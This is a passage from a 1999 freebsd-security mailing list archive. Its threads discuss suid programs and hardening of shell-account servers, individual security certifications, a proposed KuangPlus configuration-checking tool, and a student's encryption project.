QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:19:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 4A38315126 for ; Tue, 1 Jun 1999 20:19:32 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id NAA22830; Wed, 2 Jun 1999 13:21:48 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199906020321.NAA22830@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: <199906020313.UAA86277@apollo.backplane.com> from Matthew Dillon at "Jun 1, 1999 8:13:42 pm" To: dillon@apollo.backplane.com (Matthew Dillon) Date: Wed, 2 Jun 1999 13:21:48 +1000 (EST) Cc: akm@mail.theinternet.com.au, matt@Mlink.NET, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Matthew Dillon ]--------------------------------------------- | : | :Unless you have multiple remote admins, who you don't want to be | :able to stuff with the conf files, but, you do want them to be able | :to restart the daemon. | : | | You can always argue that your favoriate methods of admin requires | binaries to be suid-root, but all it means is that you need to change | your methods. I'd agree that you don't want it suid root, I don't agree that you don't want it suid some other non-privelged user. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:29:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from blackhole.pmg.net (blackhole.pmg.net [209.137.70.29]) by hub.freebsd.org (Postfix) with ESMTP id 05F2B151A9 for ; Tue, 1 Jun 1999 20:29:18 -0700 (PDT) (envelope-from pritchet@bigfoot.com) Received: from fury (localhost [127.0.0.1]) by blackhole.pmg.net (8.9.2/8.9.2) with SMTP id XAA02290 for ; Tue, 1 Jun 1999 23:37:45 -0400 (EDT) (envelope-from pritchet@bigfoot.com) Message-Id: <4.1.19990601232241.0093e100@127.0.0.1> X-Sender: pritchet@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 01 Jun 1999 23:24:19 -0400 To: freebsd-security@freebsd.org From: Ron Pritchett Subject: Security Ceritfication for individuals Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was wondering if any of the security orginazations (CERT, ICSA, etc) offer certification for individuals... I was thinking along the lines of Sun and Cisco's programs..... thanks! --- Ron++ Atlanta, GA "This message has been digitally remastered and letterboxed to 16:9 format for your viewing pleasure." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:32: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id A3A14151A9 for ; Tue, 1 Jun 1999 20:32:01 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id UAA86389; Tue, 1 Jun 1999 20:31:53 -0700 (PDT) (envelope-from dillon) Date: Tue, 1 Jun 1999 20:31:53 -0700 (PDT) From: Matthew Dillon Message-Id: <199906020331.UAA86389@apollo.backplane.com> To: Andrew Kenneth Milton Cc: akm@mail.theinternet.com.au, matt@Mlink.NET, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system References: <199906020321.NAA22830@mail.theinternet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :I'd agree that you don't want it suid root, I don't agree that you :don't want it suid some other non-privelged user. : :-- :Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew If the admin is supposed to be able to do some operation on the server, such as restart it, then having a suid-(server-uid) program that does that *ONE* thing and making it group-executable to the set of admins allowed to do that *ONE* thing is not going to compromise security any more then giving the admin access to (server-uid) account. It is appropriate to be wary of suid programs, but not overly paranoid. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 21:24:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 1D7EE14DCA for ; Tue, 1 Jun 1999 21:24:16 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id OAA00771; Wed, 2 Jun 1999 14:24:16 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199906020424.OAA00771@henry.cs.adfa.edu.au> Subject: Idea for New Security Tool To: security@freebsd.org Date: Wed, 2 Jun 1999 14:24:16 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org All, I've got a friend, Jeff Howard, working on a security-related Masters project. Essentially, it's a new version of the COPS/Kuang tool from Spafford and Farmer, but with one large difference. In the new version, which we call KuangPlus, the system core is distributed with just the induction engine and no security rules (well, very few rules). However, the system has the ability to: + download new rules from the network + verify their authenticity (using public-key crypto) + and load/run the rules on the fly, once verified The idea is that, as new security vulnerabilities are found, new rules can be created, signed and put up on the Internet for download. Any individual, group, organisation can make new rules: the FreeBSD team, individual Linux distribution teams, the Sendmail guys etc. An admin who is prepared to _trust_ the rules made by organisation X, will obtain X's public key and install it into the KuangPlus system. As the organisation releases new rules, these are automatically integrated into the local ruleset base. KuangPlus is mainly designed to find configuration flaws which could lead to security deficiencies. It's not a network vulnerability tool like Nessus or SATAN. Some more details about Jeff Howard's KuangPlus project are on the web at http://minnie.cs.adfa.edu.au/KuangPlus/ So What? -------- So why are we posting this info to security@freebsd.org? The project is in the early stages. We'd dearly love some people to a) tell us what good things KuangPlus should/shouldn't do, and b) think of areas in the design of the system which need improvement. Once the system gets to alpha- or beta- level, we'd also like to get some FreeBSD rules written! We'll be doing some ourselves, but the real goal is to get the vendors to write rules for their own systems. Anyway, if you're interested in helping out, please email me back. I'll act as general co-ordinator. Jeff's wife has just had their first baby too, so Jeff's already got a lot on his plate. Many thanks in advance for all your suggestions. Warren and Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 21:31:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id 4BCC314DCA for ; Tue, 1 Jun 1999 21:31:40 -0700 (PDT) (envelope-from nick@feralmonkey.org) Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id PAA12347; Wed, 2 Jun 1999 15:21:52 GMT (envelope-from nick@feralmonkey.org) Date: Wed, 2 Jun 1999 15:21:51 +0000 (GMT) From: 0x1c To: Ron Pritchett Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Ceritfication for individuals In-Reply-To: <4.1.19990601232241.0093e100@127.0.0.1> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I believe the computer security institute offers CISSP. Certified Information Systems Security Professional or similar. Nick On Tue, 1 Jun 1999, Ron Pritchett wrote: > I was wondering if any of the security orginazations (CERT, ICSA, etc) offer > certification for individuals... I was thinking along the lines of Sun and > Cisco's > programs..... > > > thanks! > > > --- > Ron++ > Atlanta, GA > > "This message has been digitally remastered and > letterboxed to 16:9 format for your viewing pleasure." > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 22:47:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from ewok.creative.net.au (ewok.creative.net.au [203.30.44.41]) by hub.freebsd.org (Postfix) with SMTP id 0C56114C82 for ; Tue, 1 Jun 1999 22:47:26 -0700 (PDT) (envelope-from adrian@freebsd.org) Received: (qmail 12311 invoked by uid 1008); 2 Jun 1999 05:47:24 -0000 Message-ID: <19990602054724.12309.qmail@ewok.creative.net.au> From: adrian@freebsd.org To: Andrew Kenneth Milton Cc: freebsd-security@freebsd.org Subject: Re: Shell Account system In-reply-to: Your message of "Wed, 02 Jun 1999 11:47:27 +1000." <199906020147.LAA21482@mail.theinternet.com.au> Date: Wed, 02 Jun 1999 13:47:23 +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Andrew Kenneth Milton writes: >+----[ Bruce Campbell ]--------------------------------------------- >| On Tue, 1 Jun 1999, Cain wrote: >| >| > In addition to tripwire, monitor the existence of all SUID programs, when >| > new ones appear make sure you know about it. BTW, ircd is usually SUID, so >| > if a user of yours sets that up it's normal. But then how do you know a >| > hacker just hasn't named his root shell ircd... so monitor the sizes of >| > new SUID programs >| >| Possibly putting my foot in my mouth here, but *why* would ircd need to be >| SUID to anyone? It commonly runs at the high ports (6667) and thus does >| not need root for that. >| >| If you want a specific ircd user to run ircd (either by script or by >| respawning from init), I don't see a need for the ircd binary to be SUID >| to anyone (executable only be that user yes, SUID no) >| >| Or am I missing something here? > >It's normally suid because the conf files are readable only by the >'owner' -- it's also suid to limit the damage you can do, normally >you setup an 'irc' account and make it suid that. I'm oing to look at phk's jail stuff soon in application for a shell server, but right now, the king shell server I ran has /usr/home , /tmp (which is also /var/tmp) mounted noexec, nosuid, nosgid. The worst thing in the world you can ever do is allow users to compile/run their own binaries. If a user wants something installed, then I'll damn well compile it and install it for *all* to use. Adrian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 23:54:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 662181522D; Tue, 1 Jun 1999 23:54:52 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id IAA24213; Wed, 2 Jun 1999 08:54:36 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: adrian@FreeBSD.ORG Cc: Andrew Kenneth Milton , freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-reply-to: Your message of "Wed, 02 Jun 1999 13:47:23 +0800." <19990602054724.12309.qmail@ewok.creative.net.au> Date: Wed, 02 Jun 1999 08:54:36 +0200 Message-ID: <24211.928306476@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990602054724.12309.qmail@ewok.creative.net.au>, adrian@FreeBSD.OR >The worst thing in the world you can ever do is allow users to compile/run >their own binaries. If a user wants something installed, then I'll damn >well compile it and install it for *all* to use. Go into the kernel, modify it so only suser() can set a execute bit. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 1:18:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 557F314E46 for ; Wed, 2 Jun 1999 01:18:36 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id MAA15600; Wed, 2 Jun 1999 12:18:37 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Wed, 2 Jun 1999 12:17:46 +0400 Received: from undisclosed-intranet-sender id xma013304; Wed, 2 Jun 99 12:17:33 +0400 Date: Wed, 2 Jun 1999 12:17:21 +0400 Message-Id: <199906020817.MAA31586@paranoid.eltex.spb.ru> In-Reply-To: <4.1.19990601232241.0093e100@127.0.0.1> from "Ron Pritchett " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: Security Ceritfication for individuals To: pritchet@bigfoot.com Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Tekmetrics has announced it. I'd better not trust ICSA. IMHO security certification is all bullshit (in RL) but it is going to be free with Tekmetrics at least. I'd better say to fsck off to potential employer if he asks me if i have ICSA certification ;) Ron Pritchett said : > I was wondering if any of the security orginazations (CERT, ICSA, etc) offer > certification for individuals... I was thinking along the lines of Sun and > Cisco's > programs..... > > > thanks! _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN1Toj6H/mIJW9LeBAQG6bQP/ewnmE6Gx7BE1UOTB2iKuWnJzpe4kiW+J qTCudHxKkXw8xVB445TBet6GlRgpXjqtBR0oHc+anr1Ew+b2Wv1daeNaPjK5x38K 0Ew9zo2rZvRfbEIWm5ffERT9sGlrFmPvC35/uzfBAXHUbp5T2/YPaUDkXWvsibpD dWWQ8BL3rfg= =cILZ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 1:43:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from sentry.isrc.qut.edu.au (sentry.isrc.qut.edu.au [131.181.97.10]) by hub.freebsd.org (Postfix) with SMTP id AF77915893 for ; Wed, 2 Jun 1999 01:43:49 -0700 (PDT) (envelope-from gaskell@isrc.qut.edu.au) Received: (qmail 22277 invoked from network); 2 Jun 1999 08:43:48 -0000 Received: from primrose.isrc.qut.edu.au (@131.181.6.10) by secure.isrc.qut.edu.au with SMTP; 2 Jun 1999 08:43:48 -0000 Received: from primrose.isrc.qut.edu.au (primrose.isrc.qut.edu.au [131.181.6.10]) by primrose.isrc.qut.edu.au (8.8.8+Sun/8.8.0/brad) with ESMTP id SAA00507; Wed, 2 Jun 1999 18:43:47 +1000 (EST) Date: Wed, 2 Jun 1999 18:43:47 +1000 (EST) From: Gary Gaskell To: ark@eltex.ru Cc: pritchet@bigfoot.com, freebsd-security@FreeBSD.ORG Subject: Re: Security Ceritfication for individuals In-Reply-To: <199906020817.MAA31586@paranoid.eltex.spb.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Agreed. I've seen some sharks that claim that they've been certified by their firewall vendor. One even claimed he was certified to train people in a particular firewall product, and this man let through all UDP and could not figure out how to allow return traffic without letting in SYN packets for high ports! hence I see vendor certification as a load of rubbish, possibly save that of Cisco. Gary On Wed, 2 Jun 1999 ark@eltex.ru wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > nuqneH, > > Tekmetrics has announced it. I'd better not trust ICSA. > IMHO security certification is all bullshit (in RL) but it is going to be > free with Tekmetrics at least. > I'd better say to fsck off to potential employer if he asks me if i have > ICSA certification ;) > > Ron Pritchett said : > > > I was wondering if any of the security orginazations (CERT, ICSA, etc) offer > > certification for individuals... I was thinking along the lines of Sun and > > Cisco's > > programs..... > > > > > > thanks! > > _ _ _ _ _ _ _ > {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ > (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| > [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3i > Charset: noconv > > iQCVAwUBN1Toj6H/mIJW9LeBAQG6bQP/ewnmE6Gx7BE1UOTB2iKuWnJzpe4kiW+J > qTCudHxKkXw8xVB445TBet6GlRgpXjqtBR0oHc+anr1Ew+b2Wv1daeNaPjK5x38K > 0Ew9zo2rZvRfbEIWm5ffERT9sGlrFmPvC35/uzfBAXHUbp5T2/YPaUDkXWvsibpD > dWWQ8BL3rfg= > =cILZ > -----END PGP SIGNATURE----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Cheers, Gary ----------------------------------------------------------- Gary Gaskell Manager Secure Network Laboratory Phone (07) 3864 1190 Information Security Research Centre Fax (07) 3221 2384 Queensland University of Technology ----------------------------------------------------------- _--_|\ / QUT A University for http://www.qut.edu.au/ _.--._/ the Real World. v To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 4: 3:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from easeway.com (ns1.easeway.com [209.69.39.1]) by hub.freebsd.org (Postfix) with ESMTP id 0F27314D0F for ; Wed, 2 Jun 1999 04:03:23 -0700 (PDT) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id GAA05703 for security@freebsd.org; Wed, 2 Jun 1999 06:54:27 -0400 (EDT) Message-Id: <199906021054.GAA05703@easeway.com> Subject: Re: Security Ceritfication for individuals In-Reply-To: from Gary Gaskell at "Jun 2, 99 06:43:47 pm" To: security@freebsd.org Date: Wed, 2 Jun 1999 06:54:27 -0400 (EDT) From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Oh, vendor "security" training has its uses. You learn how to operate that one product. If the product has a poorly-designed interface, or is full of hideous quirks (i.e., Checkpoint on NT), that's invaluable. But it has nothing to do with security. When people use vendor certification as their main selling point, it's time to run. ==ml > Agreed. I've seen some sharks that claim that they've been certified by > their firewall vendor. One even claimed he was certified to train people > in a particular firewall product, and this man let through all UDP and > could not figure out how to allow return traffic without letting in SYN > packets for high ports! hence I see vendor certification as a load of > rubbish, possibly save that of Cisco. > > Gary > -- Michael Lucas | Exceptionet, Inc. | www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 7:21: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from federation.addy.com (federation.addy.com [207.239.68.2]) by hub.freebsd.org (Postfix) with ESMTP id D278014D04 for ; Wed, 2 Jun 1999 07:20:58 -0700 (PDT) (envelope-from jim@federation.addy.com) Received: from localhost (jim@localhost) by federation.addy.com (8.8.5/8.6.12) with SMTP id KAA20796 for ; Wed, 2 Jun 1999 10:20:57 -0400 (EDT) Date: Wed, 2 Jun 1999 10:20:56 -0400 (EDT) From: Jim Sander Reply-To: Jim Sander Cc: freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: <19990602054724.12309.qmail@ewok.creative.net.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The worst thing in the world you can ever do is allow users to compile/run > their own binaries. If a user wants something installed, then I'll damn > well compile it and install it for *all* to use. Um, I'd have to disagree there. Assuming you're talking about non-root level users of course. The big problem is of course scaling. If you have 10 users, it's easy. When you have 1000, spread out over a dozen servers it becomes challenging to administer. Everyone wants something different, and it's usually incompatible with what someone else wants. It takes time and effort that could be better spent securing your system in other ways. Then try upgrading anything and you'll be screwed even worse! If they're compiling as a "normal" user, they should/are restricted from potentially dangerous operations. Nothing is perfect, but if you're that paranoid you should not have any users on the system at all. Plus, there's almost nothing you can do with a compiler that can't also be done with Perl anyway. (surely you let users have Perl!) The name of the game of course is to be better, faster, and more attentive to detail than anyone on your systems who would seek to do something they shouldn't. You can't do that if you're installing strange things for one user or doing updates every time a bug in is found. Just my opinion of course... -=Jim=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 9:39:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from freed.ddns.org (derby.JSP.UMontreal.CA [132.204.45.26]) by hub.freebsd.org (Postfix) with ESMTP id 576BE15974 for ; Wed, 2 Jun 1999 09:39:29 -0700 (PDT) (envelope-from spidey@jsp.umontreal.ca) Received: from localhost (spidey@localhost) by freed.ddns.org (8.9.3/8.9.3) with ESMTP id MAA00809; Wed, 2 Jun 1999 12:39:02 -0400 (EDT) (envelope-from spidey@jsp.umontreal.ca) X-Authentication-Warning: freed.ddns.org: spidey owned process doing -bs Date: Wed, 2 Jun 1999 12:39:01 -0400 (EDT) From: Spidey X-Sender: spidey@freed.ddns.org Reply-To: Spidey To: Unknow User Cc: Kris Kennaway , security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: <37534264.6D29110A@tdnet.com.br.> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org May I add that you would surely like to read the security(7) man page. It is a quite great primer. ciao. ants. On Mon, 31 May 1999, Unknow User wrote: > Yeah, thanks, but the system is for anyone able to pay, so, you can say > i trust nobody. > > Kris Kennaway wrote: > > > > On Mon, 31 May 1999, Joe Gleason wrote: > > > > [Snip] > > > > Good advice, but running a shell account for people who you don't really trust > > is still not a wise move for the inexperienced, and not something you can > > easily document in a webpage. UNIX security is a way of life - there are any > > number of things which the unwary can trip over which could potentially > > compromise your machine. > > > > If it's for a small group of users who you trust fairly well, you > > probably should be okay, though. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Un éducateur dans l'âme ne prend rien au sérieux que par rapport à ses disciples -- soi-même non excepté. -Nietzsche, "Par delà le bien et le mal" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 10:50:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 8D1EF15108 for ; Wed, 2 Jun 1999 10:50:13 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id KAA11243; Wed, 2 Jun 1999 10:49:35 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id KAA01200; Wed, 2 Jun 1999 10:49:34 -0700 Received: from softweyr.com (dyn2.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA16650; Wed, 2 Jun 99 10:49:31 PDT Message-Id: <37556EAB.6101B755@softweyr.com> Date: Wed, 02 Jun 1999 11:49:31 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: ark@eltex.ru Cc: pritchet@bigfoot.com, freebsd-security@FreeBSD.ORG Subject: Re: Security Ceritfication for individuals References: <199906020817.MAA31586@paranoid.eltex.spb.ru> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ark@eltex.ru wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > nuqneH, > > Tekmetrics has announced it. I'd better not trust ICSA. > IMHO security certification is all bullshit (in RL) but it is going to be > free with Tekmetrics at least. > I'd better say to fsck off to potential employer if he asks me if i have > ICSA certification ;) I just poked around the Tekmetrics web site, and it looks pretty good. If anyone is interested in creating FreeBSD certifications, as a programmer, system administrator, or security administrator, working with Tekmetrics to make FreeBSD-specific versions of their generic UNIX exams would be a good starting point. http://www.tekmetrics.com/ (duh!) Try out the Dilbert "fun exam" for a sample of what their test procedures look like. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 17:49:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from konichiwa.cc.columbia.edu (konichiwa.cc.columbia.edu [128.59.59.132]) by hub.freebsd.org (Postfix) with ESMTP id 6436314EF8 for ; Wed, 2 Jun 1999 17:48:55 -0700 (PDT) (envelope-from stuyman@confusion.net) Received: from confusion.net (dialup-11-9.cc.columbia.edu [128.59.36.245]) by konichiwa.cc.columbia.edu (8.8.5/8.8.5) with ESMTP id UAA06601 for ; Wed, 2 Jun 1999 20:48:50 -0400 (EDT) Message-ID: <3755D0E4.55677E6@confusion.net> Date: Wed, 02 Jun 1999 20:48:36 -0400 From: Laurence Berland Organization: B.R.A.T.T. X-Mailer: Mozilla 4.5 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Not freebsd related...yet Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm writing a new encryption algorithm for my computer science final project. Although it doesnt need to be particularly great I'm thinking there's no reason it's gotta be bad. I'm building a symmetric algorithm that is designed to specifically handle large keys ie >1024 bytes. If anyone has any hints or suggestions, I'm open to them...in fact that's why I'm writing this in the first place. If it works well, maybe someday people will actually use it, then again maybe not. thanks for your time. -- Laurence Berland, Stuyvesant HS Debate <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> Windows 98: n. useless extension to a minor patch release for 32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand for 1 bit of competition. http://stuy.debate.net icq #7434346 aol imer E1101 The above email Copyright (C) 1999 Laurence Berland All rights reserved To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 18:38:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from valis.worldgate.com (valis.worldgate.com [198.161.84.2]) by hub.freebsd.org (Postfix) with ESMTP id 8536A14E5D for ; Wed, 2 Jun 1999 18:38:21 -0700 (PDT) (envelope-from skafte@gras-varg.worldgate.com) Received: from gras-varg.worldgate.com (skafte@gras-varg.worldgate.com [198.161.84.12]) by valis.worldgate.com (8.9.1a/8.9.1) with ESMTP id SAA11869 for ; Wed, 2 Jun 1999 18:55:26 -0600 (MDT) Received: (from skafte@localhost) by gras-varg.worldgate.com (8.9.1a/8.9.1) id SAA25553 for freebsd-security@freebsd.org; Wed, 2 Jun 1999 18:55:25 -0600 (MDT) Date: Wed, 2 Jun 1999 18:55:24 -0600 From: Greg Skafte To: freebsd-security@freebsd.org Subject: Has anyone looked at Message-ID: <19990602185524.D24872@gras-varg.worldgate.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i Organization: WorldGate Inc. X-PGP-Fingerprint: 42 9C 2C A8 4D 2B C9 C4 7D B6 00 B0 50 47 20 97 X-URL: http://gras-varg.worldgate.com/~skafte Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Rule Set Based Access Control (RSBAC) - Homepage URL: http://www.compuniverse.com/rsbac/ Its a set of patches for linux but there are some interesting papers and such listed. Mabe some ideas for the FreeBSD-harden project -- Email: skafte@worldgate.com Voice: +780 413 1910 Fax: +780 421 4929 #575 Sun Life Place * 10123 99 Street * Edmonton, AB * Canada * T5J 3H1 -- -- When things can't get any worse, they simplify themselves by getting a whole lot worse then complicated. A complete and utter disaster is the simplest thing in the world; it's preventing one that's complex. (Janet Morris) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 2 22:10: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from tas5-atm.tampabay.rr.com (tas5-atm.tampabay.rr.com [24.92.0.55]) by hub.freebsd.org (Postfix) with ESMTP id C7EC714F0C for ; Wed, 2 Jun 